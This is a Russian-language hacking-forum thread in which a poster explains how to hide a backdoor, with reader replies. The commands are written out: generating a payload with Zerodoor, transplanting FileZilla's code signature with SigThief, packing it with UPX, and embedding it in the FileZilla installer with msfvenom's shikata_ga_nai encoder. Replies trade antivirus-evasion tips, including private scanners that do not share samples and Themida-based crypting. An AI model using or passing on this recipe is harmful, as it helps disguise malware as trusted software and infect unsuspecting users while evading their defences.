• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Прячем свой Бэкдор

codeby.png

Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же
1518541100542.png


Скажу честно это мой лучший результат )

Основная часть

Для всего процесса нам понядобятся :
Zerodoor - https://github.com/Souhardya/Zerodoor
SigThief - https://github.com/secretsquirrel/SigThief
UPX - apt install
upx
msfvenom

Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем
1518542328241.png


Запустили программу и выбираем нужные пункты :
1518542518109.png

1518542595411.png
1518542633705.png

тут ваш ip , что бы узнать ip вводим ifconfig
1518542729158.png
Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :

1518543630655.png

Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу
Код:
 python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe

-i - путь до файла с подписью
-t - путь до нашего файла
-o - путь до нашего будующего файла

1518544353658.png


Все подпись подделана. Теперь сожмем файл спомощью UPX

Код:
upx -5 /путь до файла

1518544615823.png


Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla

Код:
msfvenom -a x86 --platform Windows  -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5
1518546240846.png


Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)
 

Вложения

  • 1518542218019.png
    1518542218019.png
    24,3 КБ · Просмотры: 279
  • 1518542551126.png
    1518542551126.png
    62,7 КБ · Просмотры: 272
  • 1518542572866.png
    1518542572866.png
    59,9 КБ · Просмотры: 273
O

OneDollar

Интересно, а ты часом по факту Касперским не проверял? Потому что у меня билд на сайте показывает, что Касперскому на него насрать, но в итоге " обнаружено".
p.s. билд генерил другим способом
 

Kaotina

Green Team
07.02.2018
22
55
BIT
0
Интересно, а ты часом по факту Касперским не проверял? Потому что у меня билд на сайте показывает, что Касперскому на него насрать, но в итоге " обнаружено".
p.s. билд генерил другим способом

Проверить антивирусом возможности не было :( Ось линукс, а винду качать и ставить при скорости инета 0.4 мб/с долговато.Проверял на этом сайте (который на скринах) и на вирустотал еще для сравнения
 
N

n01n02h

У меня может андроид такой, но все билды которые делал, через pupy, venom, др веб даже не замечает
 
T

The ROOT

Да забудьте вы про вирустотал вообще! Нельзя там чекать свои файлы, используйте viruscheckmate или если жалко денег на nodistribute, но у него базы старее чем у первого.

Кстати результат будет намного лучше, если использовать Resource Hacker в связке с TheMida, каждый день по несколько раз приходится так делать, результат на чекмейт 2-4 детекта, такой-же и рантайм результат
 
  • Нравится
Реакции: stalker320 и gushmazuko

Kaotina

Green Team
07.02.2018
22
55
BIT
0
Да забудьте вы про вирустотал вообще! Нельзя там чекать свои файлы, используйте viruscheckmate или если жалко денег на nodistribute, но у него базы старее чем у первого.

Кстати результат будет намного лучше, если использовать Resource Hacker в связке с TheMida, каждый день по несколько раз приходится так делать, результат на чекмейт 2-4 детекта, такой-же и рантайм результат
Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----

У меня может андроид такой, но все билды которые делал, через pupy, venom, др веб даже не замечает
может у тебя доктор не такой ?)
 
Последнее редактирование:
N

n01n02h

Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----


может у тебя доктор не такой ?)
все может
 
K

kamaz

Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----


может у тебя доктор не такой ?)
да и сигнатуру тулзы твоей которой пайлоад генериш.
мне панравилось твоя писанина пиши ишо:rolleyes:
 
  • Нравится
Реакции: gushmazuko

arees

Green Team
08.10.2017
37
28
BIT
0
Да бред палится абсолютно всеми антивирусами если тотал и пропускает то на самом хосте даже avg ругается, а по поводу shikata_ga_nai стандартные крипторы лучше вообще не использовать многие палят именно по их сигнатуре
 

Kaotina

Green Team
07.02.2018
22
55
BIT
0
Да бред палится абсолютно всеми антивирусами если тотал и пропускает то на самом хосте даже avg ругается, а по поводу shikata_ga_nai стандартные крипторы лучше вообще не использовать многие палят именно по их сигнатуре
Не сказал бы, знакомый тестил на своем компе (виндовс 7 антивир "AVG") зашла на ура, и еще заметил такую вещь ( ав был AVAST) если на момент запуска антивир отключить, а потом включить, то антивирус тупо не мог удалить файл до тех пор пока ты не отключишься.
ты имеется ввиду атакующий
 

arees

Green Team
08.10.2017
37
28
BIT
0
Не сказал бы, знакомый тестил на своем компе (виндовс 7 антивир "AVG") зашла на ура, и еще заметил такую вещь ( ав был AVAST) если на момент запуска антивир отключить, а потом включить, то антивирус тупо не мог удалить файл до тех пор пока ты не отключишься.
ты имеется ввиду атакующий
ну в этом весь и смысл "если отключить" а если не отключать ))) у меня не один не пропустил кроме касперского ну при создании сессии касперский сразу ругнулся и все почистил а если эвристический типо norton он сразу удаляет файл целиком так что не панацея увы
 

Kaotina

Green Team
07.02.2018
22
55
BIT
0
Тема года 16ого вы чего хотите?
Я конечно все понимаю вы этой информацией владели 16 году, вы молодец! Но надо помнить что помимо вас есть другие люди, которые только не давно узнали.
А если у вас есть новая информация, то попрощу вас поделиться, так как может быть, что я наткнусь на это через года 2-3. И что бы вы не написали " Тема года 18ого вы чего хотите?" )
 
09.11.2017
258
260
BIT
5
на себе нужно проверять =)всё это и не бояться же это твоё творение и не чужое)
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Молодцом нормальная статья...особенно полезна для начинающих.
 
  • Нравится
Реакции: 0x001a

mrOkey

Grey Team
14.11.2017
967
976
BIT
0
Я конечно все понимаю вы этой информацией владели 16 году, вы молодец! Но надо помнить что помимо вас есть другие люди, которые только не давно узнали.
А если у вас есть новая информация, то попрощу вас поделиться, так как может быть, что я наткнусь на это через года 2-3. И что бы вы не написали " Тема года 18ого вы чего хотите?" )
Я это к жалобам о том, что палится
 
G

Generichack

Посмотреть вложение 15765
Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же


Скажу честно это мой лучший результат )

Основная часть

Для всего процесса нам понядобятся :
Zerodoor - Souhardya/Zerodoor
SigThief - secretsquirrel/SigThief
UPX - apt install
upx
msfvenom

Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем


Запустили программу и выбираем нужные пункты :
Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :

Посмотреть вложение 15759
Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу
Код:
 python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe

-i - путь до файла с подписью
-t - путь до нашего файла
-o - путь до нашего будующего файла

Посмотреть вложение 15760

Все подпись подделана. Теперь сожмем файл спомощью UPX

Код:
upx -5 /путь до файла

Посмотреть вложение 15761

Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla

Код:
msfvenom -a x86 --platform Windows  -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5
Посмотреть вложение 15762

Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)
При запуске -

Screenshot_1.jpg
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!